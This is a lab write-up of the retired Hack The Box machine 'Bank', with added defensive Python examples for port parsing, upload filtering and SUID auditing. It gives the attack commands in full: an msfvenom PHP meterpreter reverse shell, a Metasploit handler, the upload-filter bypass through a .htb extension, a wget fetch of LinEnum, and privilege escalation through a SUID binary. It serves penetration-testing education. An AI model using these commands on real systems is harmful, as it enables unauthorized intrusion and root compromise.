Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Bank is a relatively simple machine; however, proper web enumeration is key to finding the necessary data for entry.
We will use the following tools to pwn the box from a Kali Linux machine:
- nmap
- gobuster
- searchsploit
- msfconsole
- metasploit
- meterpreter
- LinEnum
Let's get started.
Step 1 - Reconnaissance
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.
Port scanning
I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to perform an intensive scan:
nmap -A -v bank.htb
-A: enable OS detection, version detection, script scanning, and traceroute
-v: increase verbosity level
bank.htb: hostname for the Bank box
If you find the results a little bit too overwhelming, you can run a plain scan that only lists the open ports.
nmap bank.htb
We can see that there are 3 open ports:
Port 22, Secure Shell (SSH): secure logins, file transfers (scp, sftp) and port forwarding
Port 53, Domain Name System (DNS)
Port 80, most often used by Hypertext Transfer Protocol (HTTP)
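As an added example (not part of the original post), here is a small Python parser that pulls only the open ports out of nmap's grepable output, which you get by adding -oG to the scan above. The sample output embedded in it is constructed to match the three open ports found on this box; the service version strings are placeholders, not the real scan results.

```python
"""Pull just the open ports out of nmap's grepable (-oG) output.

Added example for this write-up, not part of the original post. It assumes
the scan was saved with `nmap -A -v -oG bank.gnmap bank.htb`; the sample
lines below are constructed to match that format and are not real results.
"""
import re

# Constructed sample of nmap -oG output (version fields are placeholders).
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -A -v -oG bank.gnmap bank.htb
Host: 10.10.10.29 (bank.htb)\tStatus: Up
Host: 10.10.10.29 (bank.htb)\tPorts: 22/open/tcp//ssh//OpenSSH (example)/, 53/open/tcp//domain//ISC BIND (example)/, 80/open/tcp//http//Apache httpd (example)/, 443/closed/tcp//https///\tIgnored State: closed (996)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# Each entry in the Ports: field is  port/state/proto/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/([^/]*)/")
HOST_RE = re.compile(
    r"^Host:\s+(\S+)\s+\(([^)]*)\)\tPorts:\s+(.*?)(?:\tIgnored State.*)?$"
)


def parse_open_ports(gnmap_text):
    """Return {host_ip: [(port, proto, service, version), ...]} for open ports only."""
    result = {}
    for line in gnmap_text.splitlines():
        if line.startswith("#"):
            continue                      # comment lines carry no port data
        m = HOST_RE.match(line)
        if not m:
            continue                      # e.g. the "Status: Up" line
        ip, _hostname, ports_field = m.groups()
        open_ports = []
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open":           # closed/filtered entries are dropped
                open_ports.append((int(port), proto, service, version.strip()))
        result[ip] = sorted(open_ports)
    return result


def summarize(gnmap_text):
    """One line per host: ip -> comma-separated open port/service pairs."""
    lines = []
    for ip, ports in parse_open_ports(gnmap_text).items():
        listing = ", ".join(f"{p}/{proto} {svc}" for p, proto, svc, _ in ports)
        lines.append(f"{ip}: {listing}")
    return lines


if __name__ == "__main__":
    for line in summarize(SAMPLE_GNMAP):
        print(line)
```

Pointing parse_open_ports at the contents of a real bank.gnmap gives the same three-port summary the plain nmap run shows, without the script and traceroute noise of the -A output.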
Directory scanning
I use Gobuster. Gobuster is a directory scanner written in Go. More info on the tool here. Gobuster uses the wordlists on Kali, which are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here.
I use this command with the dirb common.txt wordlist:
gobuster dir -u bank.htb -w /usr/share/wordlists/dirb/common.txt
I can see some interesting folders. I do another directory scan with a different wordlist.
gobuster dir -u bank.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Step 2 - Visiting the web page
From the reconnaissance phase, I decide to start with port 80. It points to an Apache2 Ubuntu Default page. We need to set the hostname, following the standard convention for HTB machines: bank.htb.
I add the bank.htb entry to the /etc/hosts file with
nano /etc/hosts
with
10.10.10.29 bank.htb
I check the file with
cat /etc/hosts
When I navigate to bank.htb, I can now see a login page.
From the gobuster reconnaissance, I found some folders. I navigate to /balance-transfer.
I have a look at a couple of files. All the files seem to contain an encrypted full name, email and password.
I go back to the main page and click on the Size tab to sort the transfers. I can see that one of the files is different.
When I click on the file, I see an error message at the top: the encryption failed for this file, and I can see all the details in plain text.
I go back to the login panel and enter the credentials. I now have access to the dashboard of the HTB Bank. There is nothing interesting on this page, so I move to the Support page.
On the Support page, I can upload files. I will try to upload a payload.
Step 3 - Using MSFvenom to craft an exploit
We will use MSFvenom, which is a payload generator. You can learn more about it here.
But first, let's see in the Metasploit Framework which payload we could use to craft our exploit.
We know that we need to create a reverse shell, a type of shell in which the target machine connects back to the attacking machine. The attacking machine has a listener port on which it receives the connection; through that connection, code or command execution on the target is achieved.
The reverse TCP shell should be for PHP, and we will use Meterpreter.
From the Offensive Security website, we get this definition of Meterpreter:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here.
I launch Metasploit and search for reverse TCP payloads with the following command:
search php meterpreter reverse_tcp
I find an interesting payload, number 594, which is a Reverse TCP Stager. This payload injects the Meterpreter server DLL via the Reflective DLL Injection payload and connects back to the attacker:
payload/php/meterpreter/reverse_tcp
Now let's go back to msfvenom to craft our exploit. I use the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.36 lport=4444 -f raw > HTBbankshell.php
I then check with ls that the file has been created, and I cat the file to see the exploit with
cat HTBbankshell.php
I go back to the support page. I add the title and the message and upload the file on the form.
I click on the submit button and I see an error message. The file type is not accepted.
I check the source code and I see a comment indicating that the file extension .htb is needed to execute PHP, for debugging purposes only.
I then change the extension of my payload from HTBbankshell.php to HTBbankshell.htb.
My file is now ready to be uploaded on the support page.
And it seems to work! The payload has been uploaded on the support page.
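The .htb debugging extension is the whole weakness here: the upload filter rejects .php by name, while the web server still hands .htb files to the PHP engine. The Python below is an added example for this write-up, not the Bank application's real code (the post only describes it through its source comment). It contrasts a deny-list filter of that shape with an allow-list filter and adds the deployment check that catches an upload extension that is also mapped to a script handler. The handler mapping, the allowed extensions and the function names are assumptions.

```python
"""Upload-filter check: why a 'debug' script extension bypasses a deny-list.

Added example for this write-up, not the Bank application's real code. The
SCRIPT_EXTENSIONS mapping, ALLOWED_EXTENSIONS and the function names are
assumptions used to illustrate the weakness and its fix.
"""
import os
import secrets

# Assumed server-side handler mapping: extensions the web server hands to the
# PHP engine. The post reports that .htb was added "for debugging purposes".
SCRIPT_EXTENSIONS = {".php", ".phtml", ".htb"}

# Extensions a support-ticket form legitimately needs (assumption).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".pdf", ".txt"}


def deny_list_filter(filename):
    """Vulnerable approach: reject only names ending in .php.

    Anything the deny-list does not name, such as .htb or .phtml, passes and
    is then executed by the server because of SCRIPT_EXTENSIONS.
    """
    return not filename.lower().endswith(".php")


def allow_list_filter(filename):
    """Hardened approach: accept only a single, known-good extension.

    The comparison is case-insensitive, names with several extensions such as
    'shell.php.txt' are rejected, and dotfiles (e.g. .htaccess) never pass.
    """
    base = os.path.basename(filename)          # strip any client-supplied path
    if not base or base.startswith("."):
        return False
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False                           # no extension, or more than one
    ext = "." + parts[1]
    return ext in ALLOWED_EXTENSIONS and ext not in SCRIPT_EXTENSIONS


def stored_name(filename):
    """Never keep the client's name: random name plus the validated extension."""
    if not allow_list_filter(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = "." + os.path.basename(filename).lower().split(".")[1]
    return secrets.token_hex(16) + ext


def config_conflicts(allowed, script_exts):
    """Deployment check: no upload extension may also be a script handler.

    Returns the overlap; an empty set is the only safe answer. This is the
    check that would flag a '.htb -> PHP' debug mapping the moment .htb were
    added to the allowed upload extensions.
    """
    return {e.lower() for e in allowed} & {e.lower() for e in script_exts}


if __name__ == "__main__":
    for name in ["HTBbankshell.php", "HTBbankshell.htb", "receipt.PDF", "a.php.txt"]:
        print(f"{name:18} deny-list: {deny_list_filter(name)!s:5} "
              f"allow-list: {allow_list_filter(name)}")
    print("config conflicts:", config_conflicts(ALLOWED_EXTENSIONS, SCRIPT_EXTENSIONS))
```

Running it shows the exact shape of the bypass: HTBbankshell.htb passes the deny-list and fails the allow-list. The config_conflicts check is the one to wire into deployment tests, so that a debugging handler left in the web server configuration cannot silently turn an allowed upload type into executable code.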
Step 4 - Setting up a listener with Metasploit
Back on Metasploit, I use the following command to set the payload handler:
use exploit/multi/handler
I first set the payload:
set payload php/meterpreter/reverse_tcp
Then the LHOST:
set lhost 10.10.14.36
And finally the LPORT:
set lport 4444
If we check the options now, we should see that everything is set up.
Let's run the exploit.
After this message appears:
Started reverse TCP handler on 10.10.14.36:4444
go back to the browser and refresh the page where the uploaded script is hosted:
bank.htb/uploads/HTBbankshell.htb
You should then see a Meterpreter session created.
I start by gathering some information with getuid, which returns the real user ID of the calling process, and sysinfo.
Step 5 - Looking for the user.txt flag
I start by navigating to the root of the filesystem and listing the folders/files.
I move to the home directory with
cd home
And I can see a user called chris.
I move to the chris directory and when I list the files...
I find the user.txt file! To read the content of the file I use the command
cat user.txt
Now that we have the user flag, let's find the root flag!
Step 6 - Performing Privilege Escalation
I try to navigate to the root folder and access is denied.
I will use LinEnum to enumerate more information from this machine. LinEnum is used for scripted local Linux enumeration and privilege escalation checks. More info here.
I fetch LinEnum from GitHub with
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
I check with this command that the script has been correctly fetched:
ls -la
I use the following command
chmod 777 LinEnum.sh
to change the file permissions and make it readable, writable and executable by everyone.
Within Meterpreter, I check the location of the file on my Kali box with
lls -S "LinEnum.sh"
I start a PHP web server on another terminal with
php -S 10.10.14.36:4444
I type the following command to get a standard shell on the target system:
shell
I spawn a TTY shell with
python3 -c 'import pty;pty.spawn("/bin/bash")'
And I transfer the file to the machine with
wget http://10.10.14.36:4444/LinEnum.sh -O /tmp/LinEnum.sh
which copies the file from my Kali box to the machine's temp folder.
I then navigate to the temp folder to check that the file has been correctly moved.
I then run the script with
sh ./LinEnum.sh
The scan gives me a lot of information. I look for the interesting files section and check the SUID files. SUID (set user ID) gives a user temporary permission to run a program/file with the permissions of the file owner rather than those of the user who runs it.
I spot an interesting file:
/var/htb/bin/emergency
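LinEnum prints SUID files as ls -l lines, and the ones worth a second look are the SUID-root binaries that a clean install would not have, like the one above. The Python below is an added example (not LinEnum's own code) that parses such lines and flags SUID/SGID binaries that are missing from a baseline, live outside the system bin directories, or are world-writable. The listing and the baseline set are constructed for the example; a real audit would take the baseline from a clean install or package manifests.

```python
"""Audit SUID/SGID binaries from `ls -l` output, as LinEnum's SUID section shows them.

Added example for this write-up, not LinEnum's own code. SAMPLE_LISTING is
constructed; BASELINE_SUID and SYSTEM_BIN_DIRS are assumptions a real audit
would replace with values taken from a clean install of the same distribution.
"""
import re

# Constructed `ls -l` lines in the form LinEnum prints for SUID files.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root  47032 Jan 27  2016 /usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 14  2016 /usr/bin/sudo
-rwsr-xr-x 1 root root  40128 Jan 27  2016 /bin/su
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency
-rwxr-xr-x 1 root root  10104 Jan 27  2016 /usr/bin/uptime
-rwsrwxrwx 1 root root   1088 Jan 27  2016 /opt/backup/rotate
"""

# Assumed allow-list of SUID binaries expected on this distribution.
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su"}
SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

# mode links owner group size month day year-or-time path
LS_RE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)


def parse_ls_line(line):
    """Turn one ls -l line into a dict, or None if it does not match."""
    m = LS_RE.match(line.strip())
    if not m:
        return None
    mode = m.group("mode")
    return {
        "path": m.group("path"),
        "owner": m.group("owner"),
        "setuid": mode[3] in "sS",          # 's' in the owner-execute slot
        "setgid": mode[6] in "sS",          # 's' in the group-execute slot
        "world_writable": mode[8] == "w",   # 'w' in the other-write slot
    }


def audit_suid(listing, baseline=BASELINE_SUID):
    """Return [(path, owner, [reasons])] for every SUID/SGID file that looks wrong."""
    findings = []
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if not entry or not (entry["setuid"] or entry["setgid"]):
            continue                        # plain files are not interesting here
        path = entry["path"]
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(SYSTEM_BIN_DIRS):
            reasons.append("outside system bin directories")
        if entry["world_writable"]:
            reasons.append("world-writable")
        if reasons:
            findings.append((path, entry["owner"], reasons))
    return findings


if __name__ == "__main__":
    for path, owner, reasons in audit_suid(SAMPLE_LISTING):
        print(f"{path} (owner {owner}): {', '.join(reasons)}")
```

Feeding it the SUID section of a LinEnum report (or the output of find / -perm -4000 -type f -exec ls -l {} +) narrows the list to the handful of entries an administrator has to justify; on this box the custom binary under /var/htb/bin is exactly the kind of entry that stands out.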
I navigate to /var/htb/bin.
I run it with
./emergency
and I'm asked if I want to get a root shell :)
I have root access to the machine.
I can now navigate to the root folder.
I find the root.txt file!
To read the content of the file I use the command
cat root.txt
Congrats! You found both flags!
Please don’t hesitate to comment, ask questions or share with your friends :)
You can see more of my articles here.
You can follow me on Twitter or on LinkedIn.
And don't forget to #GetSecure, #BeSecure & #StaySecure!
Other Hack The Box articles
Keep Calm and Hack The Box - Lame
Keep Calm and Hack The Box - Legacy
Keep Calm and Hack The Box - Devel
Keep Calm and Hack The Box - Beep
Keep Calm and Hack The Box - Optimum
Keep Calm and Hack The Box - Arctic
Keep Calm and Hack The Box - Grandpa
Keep Calm and Hack The Box - Granny
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-bank/